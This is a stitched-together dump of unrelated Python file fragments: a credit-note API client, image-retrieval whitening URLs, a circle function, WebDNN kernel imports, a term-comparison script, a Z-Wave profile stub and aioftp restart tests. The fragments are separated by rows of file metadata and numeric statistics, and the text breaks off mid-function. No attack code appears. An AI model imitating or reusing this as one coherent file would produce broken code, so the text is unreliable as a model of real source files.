                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CreditNotePagedMetadata',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def retire_credit_note(self, credit_note_id, organizations, **kwargs):
        """
        Removes any remaining value from credit note
        {\"nickname\":\"Removes remaining value from credit note\",\"response\":\"deleteCreditNote.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.retire_credit_note(credit_note_id, organizations, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str credit_note_id: ID of the credit-note. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls. (required)
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the *_with_http_info variant (see create_credit_note).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.retire_credit_note_with_http_info(credit_note_id, organizations, **kwargs)
        else:
            (data) = self.retire_credit_note_with_http_info(credit_note_id, organizations, **kwargs)
            return data

    def retire_credit_note_with_http_info(self, credit_note_id, organizations, **kwargs):
        """
        Removes any remaining value from credit note
        {\"nickname\":\"Removes remaining value from credit note\",\"response\":\"deleteCreditNote.html\"}
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.retire_credit_note_with_http_info(credit_note_id, organizations, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str credit_note_id: ID of the credit-note. (required)
        :param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls. (required)
        :return: CreditNotePagedMetadata
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['credit_note_id', 'organizations']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method retire_credit_note" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'credit_note_id' is set
        if ('credit_note_id' not in params) or (params['credit_note_id'] is None):
            raise ValueError("Missing the required parameter `credit_note_id` when calling `retire_credit_note`")
        # verify the required parameter 'organizations' is set
        if ('organizations' not in params) or (params['organizations'] is None):
            raise ValueError("Missing the required parameter `organizations` when calling `retire_credit_note`")

        resource_path = '/credit-notes/{credit-note-ID}'.replace('{format}', 'json')
        path_params = {}
        if 'credit_note_id' in params:
            path_params['credit-note-ID'] = params['credit_note_id']

        query_params = {}
        if 'organizations' in params:
            query_params['organizations'] = params['organizations']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['text/plain'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CreditNotePagedMetadata',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))
| 44.958501
| 143
| 0.597546
| 3,642
| 33,584
| 5.301208
| 0.066172
| 0.060082
| 0.021132
| 0.022375
| 0.924432
| 0.907236
| 0.897809
| 0.883048
| 0.87186
| 0.858342
| 0
| 0.000436
| 0.317413
| 33,584
| 746
| 144
| 45.018767
| 0.841782
| 0.389501
| 0
| 0.760116
| 1
| 0
| 0.18801
| 0.05044
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037572
| false
| 0
| 0.020231
| 0
| 0.112717
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c16b3b33b726c1d2492967a80b684f111484ebf8
| 4,881
|
py
|
Python
|
cirtorch/modules/utils.py
|
Tarekbouamer/Image-Retrieval-for-Image-Based-Localization
|
fcad9af4f558bebb3cbec1d08e49603a452f439d
|
[
"BSD-3-Clause"
] | 3
|
2021-01-15T13:58:22.000Z
|
2021-01-22T00:03:34.000Z
|
cirtorch/modules/utils.py
|
Tarekbouamer/Image-Retrieval-for-Image-Based-Localization
|
fcad9af4f558bebb3cbec1d08e49603a452f439d
|
[
"BSD-3-Clause"
] | null | null | null |
cirtorch/modules/utils.py
|
Tarekbouamer/Image-Retrieval-for-Image-Based-Localization
|
fcad9af4f558bebb3cbec1d08e49603a452f439d
|
[
"BSD-3-Clause"
] | null | null | null |
# for some models, we have imported features (convolutions) from caffe
# because the image retrieval performance is higher for them

# pre-computed localFeatures pca whitening that can be applied before the pooling layer
L_WHITENING = {
    'resnet101' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-lwhiten-9f830ef.pth', # no pre l2 norm
    # 'resnet101' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-lwhiten-da5c935.pth', # with pre l2 norm
}

# possible globalFeatures pooling layers, each on of these can be made regional
# pre-computed regional whitening, for most commonly used architectures and pooling methods
R_WHITENING = {
    'alexnet-gem-r'    : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-alexnet-gem-r-rwhiten-c8cf7e2.pth',
    'vgg16-gem-r'      : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-vgg16-gem-r-rwhiten-19b204e.pth',
    'resnet101-mac-r'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-mac-r-rwhiten-7f1ed8c.pth',
    'resnet101-gem-r'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gem-r-rwhiten-adace84.pth',
}

# pre-computed final (globalFeatures) whitening, for most commonly used architectures and pooling methods
WHITENING = {
    'alexnet-gem'      : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-alexnet-gem-whiten-454ad53.pth',
    'alexnet-gem-r'    : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-alexnet-gem-r-whiten-4c9126b.pth',
    'vgg16-gem'        : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-vgg16-gem-whiten-eaa6695.pth',
    'vgg16-gem-r'      : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-vgg16-gem-r-whiten-83582df.pth',
    'resnet50-gem'     : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet50-gem-whiten-f15da7b.pth',
    'resnet101-mac-r'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-mac-r-whiten-9df41d3.pth',
    'resnet101-gem'    : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gem-whiten-22ab0c1.pth',
    'resnet101-gem-r'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gem-r-whiten-b379c0a.pth',
    'resnet101-gemmp'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gemmp-whiten-770f53c.pth',
    'resnet152-gem'    : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet152-gem-whiten-abe7b93.pth',
    'densenet121-gem'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-densenet121-gem-whiten-79e3eea.pth',
    'densenet169-gem'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-densenet169-gem-whiten-6b2a76a.pth',
    'densenet201-gem'  : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-densenet201-gem-whiten-22ea45c.pth',
}

# output dimensionality for supported architectures
# NOTE(review): this dict was previously defined twice; the first (older)
# definition was dead code, silently shadowed by this one. The duplicate has
# been removed; this is the union of both (the second added 'densenet264').
OUTPUT_DIM = {
    'alexnet'        :  256,
    'vgg11'          :  512,
    'vgg13'          :  512,
    'vgg16'          :  512,
    'vgg19'          :  512,
    'resnet18'       :  512,
    'resnet34'       :  512,
    'resnet50'       : 2048,
    'resnet101'      : 2048,
    'resnet152'      : 2048,
    'densenet121'    : 1024,
    'densenet161'    : 2208,
    'densenet169'    : 1664,
    'densenet201'    : 1920,
    'densenet264'    : 2688,  # largest densenet
    'squeezenet1_0'  :  512,
    'squeezenet1_1'  :  512,
}
| 61.0125
| 163
| 0.646179
| 576
| 4,881
| 5.461806
| 0.206597
| 0.144946
| 0.193261
| 0.090591
| 0.704704
| 0.704704
| 0.704704
| 0.704704
| 0.676097
| 0.639224
| 0
| 0.12133
| 0.211432
| 4,881
| 79
| 164
| 61.78481
| 0.696025
| 0.151813
| 0
| 0.557377
| 0
| 0.295082
| 0.669576
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c181ff11834299c00661a8fdc3dd79104b3e3f64
| 230
|
py
|
Python
|
functions.py
|
JoSchmutz/sonnette-
|
7218579db92f11cb0e1bd22cb66b5a3b9b4f5aa4
|
[
"Apache-2.0"
] | null | null | null |
functions.py
|
JoSchmutz/sonnette-
|
7218579db92f11cb0e1bd22cb66b5a3b9b4f5aa4
|
[
"Apache-2.0"
] | null | null | null |
functions.py
|
JoSchmutz/sonnette-
|
7218579db92f11cb0e1bd22cb66b5a3b9b4f5aa4
|
[
"Apache-2.0"
] | null | null | null |
import math
def cercle(largeurImg, hauteurImg, rayonCercle, centreCercle, precision):
    """Return precision+1 (x, y) points sampling a circle.

    The circle has radius ``rayonCercle`` and is centred at
    ``(rayonCercle, rayonCercle)``, so all coordinates are
    non-negative.  The last point repeats the first, closing the loop.

    ``largeurImg``, ``hauteurImg`` and ``centreCercle`` are accepted
    for interface compatibility but are not used by the computation —
    TODO confirm with callers whether they were meant to be.
    """
    # range() replaces the Python-2-only xrange(), which raises
    # NameError under Python 3; the iteration is otherwise identical.
    return [(rayonCercle * (1 + math.cos(2 * math.pi / precision * x)),
             rayonCercle * (1 + math.sin(2 * math.pi / precision * x)))
            for x in range(precision + 1)]
| 38.333333
| 141
| 0.747826
| 35
| 230
| 4.914286
| 0.571429
| 0.139535
| 0.186047
| 0.186047
| 0.197674
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.086957
| 230
| 5
| 142
| 46
| 0.790476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c1d20cc46be93b8bddcc3d7caf477f908e80c47a
| 3,534
|
py
|
Python
|
src/graph_transpiler/webdnn/backend/webassembly/kernels/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
src/graph_transpiler/webdnn/backend/webassembly/kernels/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
src/graph_transpiler/webdnn/backend/webassembly/kernels/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
from webdnn.backend.webassembly.kernels import abs
from webdnn.backend.webassembly.kernels import acos
from webdnn.backend.webassembly.kernels import acosh
from webdnn.backend.webassembly.kernels import arg_max
from webdnn.backend.webassembly.kernels import arg_min
from webdnn.backend.webassembly.kernels import asin
from webdnn.backend.webassembly.kernels import asinh
from webdnn.backend.webassembly.kernels import atan
from webdnn.backend.webassembly.kernels import atanh
from webdnn.backend.webassembly.kernels import average_pooling_2d
from webdnn.backend.webassembly.kernels import broadcast
from webdnn.backend.webassembly.kernels import clipped_relu
from webdnn.backend.webassembly.kernels import col2im
from webdnn.backend.webassembly.kernels import concat
from webdnn.backend.webassembly.kernels import cos
from webdnn.backend.webassembly.kernels import cosh
from webdnn.backend.webassembly.kernels import depth2space
from webdnn.backend.webassembly.kernels import elementwise
from webdnn.backend.webassembly.kernels import elementwise_add
from webdnn.backend.webassembly.kernels import elementwise_div
from webdnn.backend.webassembly.kernels import elementwise_mul
from webdnn.backend.webassembly.kernels import elementwise_pow
from webdnn.backend.webassembly.kernels import elu
from webdnn.backend.webassembly.kernels import embedding
from webdnn.backend.webassembly.kernels import exp
from webdnn.backend.webassembly.kernels import greater
from webdnn.backend.webassembly.kernels import greater_equal
from webdnn.backend.webassembly.kernels import hard_sigmoid
from webdnn.backend.webassembly.kernels import im2col
from webdnn.backend.webassembly.kernels import leaky_relu
from webdnn.backend.webassembly.kernels import local_response_normalization
from webdnn.backend.webassembly.kernels import log
from webdnn.backend.webassembly.kernels import lstm
from webdnn.backend.webassembly.kernels import max
from webdnn.backend.webassembly.kernels import max_pooling_2d
from webdnn.backend.webassembly.kernels import min
from webdnn.backend.webassembly.kernels import prod
from webdnn.backend.webassembly.kernels import reinterpret_axis
from webdnn.backend.webassembly.kernels import relu
from webdnn.backend.webassembly.kernels import reshape
from webdnn.backend.webassembly.kernels import rsqrt
from webdnn.backend.webassembly.kernels import scalar_add
from webdnn.backend.webassembly.kernels import scalar_mul
from webdnn.backend.webassembly.kernels import scalar_pow
from webdnn.backend.webassembly.kernels import select
from webdnn.backend.webassembly.kernels import sigmoid
from webdnn.backend.webassembly.kernels import sin
from webdnn.backend.webassembly.kernels import sinh
from webdnn.backend.webassembly.kernels import slice
from webdnn.backend.webassembly.kernels import softmax
from webdnn.backend.webassembly.kernels import softplus
from webdnn.backend.webassembly.kernels import softsign
from webdnn.backend.webassembly.kernels import space2depth
from webdnn.backend.webassembly.kernels import split_axis
from webdnn.backend.webassembly.kernels import sum
from webdnn.backend.webassembly.kernels import tan
from webdnn.backend.webassembly.kernels import tanh
from webdnn.backend.webassembly.kernels import tensordot
from webdnn.backend.webassembly.kernels import threshold_relu
from webdnn.backend.webassembly.kernels import tile
from webdnn.backend.webassembly.kernels import transpose
from webdnn.backend.webassembly.kernels import unpooling_2d
from webdnn.backend.webassembly.kernels import zero_padding_1d
| 55.21875
| 75
| 0.875212
| 466
| 3,534
| 6.583691
| 0.154506
| 0.205346
| 0.349087
| 0.574967
| 0.90189
| 0.90189
| 0.447523
| 0.032595
| 0
| 0
| 0
| 0.002438
| 0.071307
| 3,534
| 63
| 76
| 56.095238
| 0.932358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c1e0288289918c5c7574800cd8c6c91b609a95ef
| 6,935
|
py
|
Python
|
ate-006-thd.py
|
svetlanama/snowball
|
a41865a866dae124b4a22134f091a7d09bd0896e
|
[
"MIT"
] | null | null | null |
ate-006-thd.py
|
svetlanama/snowball
|
a41865a866dae124b4a22134f091a7d09bd0896e
|
[
"MIT"
] | null | null | null |
ate-006-thd.py
|
svetlanama/snowball
|
a41865a866dae124b4a22134f091a7d09bd0896e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env file
# -*- coding: utf-8 -*-
import pandas as pd
import libthd as thd
print("\n\n\n============\n")
# Pairs of (raw terms CSV, cleaned terms CSV); consecutive pairs are
# compared by the loop below.  The commented-out groups are alternative
# baseline corpora (ACM, Google Scholar, MS Academic, speech
# segmentation); only one group is meant to be active at a time.
files = (
    ('ontology-1/terms/W2D0000000001.csv', 'ontology-1/terms-clean/W2D0000000001.csv'),
    ('ontology-1/terms/W2D0000000002.csv', 'ontology-1/terms-clean/W2D0000000002.csv'),
    ('ontology-1/terms/W2D0000000003.csv', 'ontology-1/terms-clean/W2D0000000003.csv'),
    ('ontology-1/terms/W2D0000000004.csv', 'ontology-1/terms-clean/W2D0000000004.csv'),
    ('ontology-1/terms/W2D0000000005.csv', 'ontology-1/terms-clean/W2D0000000005.csv'),
    ('ontology-1/terms/W2D0000000006.csv', 'ontology-1/terms-clean/W2D0000000006.csv'),
    ('ontology-1/terms/W2D0000000007.csv', 'ontology-1/terms-clean/W2D0000000007.csv'),
    ('ontology-1/terms/W2D0000000008.csv', 'ontology-1/terms-clean/W2D0000000008.csv'),
    ('ontology-1/terms/W2D0000000009.csv', 'ontology-1/terms-clean/W2D0000000009.csv'),
    ('ontology-1/terms/W2D0000000010.csv', 'ontology-1/terms-clean/W2D0000000010.csv'),
    ('ontology-1/terms/W2D0000000011.csv', 'ontology-1/terms-clean/W2D0000000011.csv'),
    ('ontology-1/terms/W2D0000000012.csv', 'ontology-1/terms-clean/W2D0000000012.csv'),
    ('ontology-1/terms/W2D0000000013.csv', 'ontology-1/terms-clean/W2D0000000013.csv')
    # ('ontology-1-baseline-acm/terms/W2D0000000001.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000001.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000002.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000002.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000003.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000003.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000004.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000004.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000005.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000005.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000006.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000006.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000007.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000007.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000008.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000008.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000009.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000009.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000010.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000010.csv'),
    # ('ontology-1-baseline-acm/terms/W2D0000000011.csv', 'ontology-1-baseline-acm/terms-clean/W2D0000000011.csv'),
    #
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000001.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000001.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000002.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000002.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000003.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000003.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000004.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000004.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000005.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000005.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000006.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000006.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000007.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000007.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000008.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000008.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000009.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000009.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000010.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000010.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000011.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000011.csv'),
    # ('ontology-1-baseline-google-scholar/terms/W2D0000000012.csv', 'ontology-1-baseline-google-scholar/terms-clean/W2D0000000012.csv'),
    #
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000001.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000001.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000002.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000002.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000003.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000003.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000004.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000004.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000005.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000005.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000006.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000006.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000007.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000007.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000008.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000008.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000009.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000009.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000010.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000010.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000011.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000011.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000012.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000012.csv'),
    # ('ontology-1-baseline-ms-academic/terms/W2D0000000013.csv', 'ontology-1-baseline-ms-academic/terms-clean/W2D0000000013.csv'),
    # ('speechsegmentation/terms/W2D0000000001.csv', 'speechsegmentation/terms-clean/W2D0000000001.csv'),
    # ('speechsegmentation/terms/W2D0000000002.csv', 'speechsegmentation/terms-clean/W2D0000000002.csv'),
    # ('speechsegmentation/terms/W2D0000000003.csv', 'speechsegmentation/terms-clean/W2D0000000003.csv'),
)
# Compare every consecutive pair of cleaned term files and print the
# drift metrics (eps / thd / thdr) computed by libthd for each pair.
for i in range(0, len(files) - 1):
    # print(...) replaces the Python-2-only `print "..."` statement,
    # which is a SyntaxError on Python 3 — the rest of this file
    # already uses the print() function.
    print("------starting new iteration--------")
    # files[i][1] is the cleaned CSV of the pair; columns are
    # ';'-separated term;cvalue rows with no header.
    df_T1 = pd.read_csv(files[i][1], sep=";", header=None, names=['term', 'cvalue']).set_index('term')
    df_T2 = pd.read_csv(files[i+1][1], sep=";", header=None, names=['term', 'cvalue']).set_index('term')
    # NOTE(review): thd.thd appears to return (eps, thd, thdr) in that
    # order — confirm against libthd, since the print below labels
    # them as eps/thdr/thd.
    val_eps, val_thd, val_thdr = thd.thd(df_T1, df_T2)
    print(files[i], files[i+1], 'eps',val_eps, 'thdr=', val_thdr, 'thd=', val_thd)
| 97.676056
| 136
| 0.717952
| 855
| 6,935
| 5.807018
| 0.076023
| 0.177644
| 0.234441
| 0.29003
| 0.903726
| 0.817925
| 0.716213
| 0.536354
| 0.064451
| 0.064451
| 0
| 0.200833
| 0.10036
| 6,935
| 70
| 137
| 99.071429
| 0.594967
| 0.724009
| 0
| 0
| 0
| 0
| 0.567148
| 0.514714
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.083333
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a9dd87af86fc158afeef8a3559c597fc5a6de69d
| 199
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_KR_validation_testing.py
|
PascalGuenther/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_KR_validation_testing.py
|
PascalGuenther/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_KR_validation_testing.py
|
PascalGuenther/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from ..nerio.z_wave_KR_validation_testing import z_wave_KR_validation_testing as z_wave_KR_validation_testing_nerio
class z_wave_KR_validation_testing(z_wave_KR_validation_testing_nerio):
    """Nixi-part Z-Wave KR validation-testing profile.

    Inherits everything unchanged from the nerio variant; this subclass
    exists only to register the profile under the nixi part.
    """
    pass
| 33.166667
| 115
| 0.894472
| 33
| 199
| 4.727273
| 0.333333
| 0.160256
| 0.224359
| 0.544872
| 0.833333
| 0.371795
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075377
| 199
| 5
| 116
| 39.8
| 0.847826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
e73916849e16359b3ba6fd19aae86cb74bb31da9
| 4,603
|
py
|
Python
|
tests/test-restart.py
|
maurice0918/aioftp
|
a3967472bad8ce1ad255e08bd1bc8725dc5188ce
|
[
"Apache-2.0"
] | null | null | null |
tests/test-restart.py
|
maurice0918/aioftp
|
a3967472bad8ce1ad255e08bd1bc8725dc5188ce
|
[
"Apache-2.0"
] | null | null | null |
tests/test-restart.py
|
maurice0918/aioftp
|
a3967472bad8ce1ad255e08bd1bc8725dc5188ce
|
[
"Apache-2.0"
] | null | null | null |
import nose
from common import * # noqa
import aioftp
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_retr_0(loop, client, server, *, tmp_dir):
    """RETR with REST offset 0 must return the entire file."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    async with client.download_stream("foo.txt", offset=0) as stream:
        r = await stream.read()
    await client.quit()
    tmp_file.unlink()
    nose.tools.eq_(r, b"foobar")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_retr_3(loop, client, server, *, tmp_dir):
    """RETR with REST offset 3 must skip the first 3 bytes ("foo")."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    async with client.download_stream("foo.txt", offset=3) as stream:
        r = await stream.read()
    await client.quit()
    tmp_file.unlink()
    nose.tools.eq_(r, b"bar")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_retr_100(loop, client, server, *, tmp_dir):
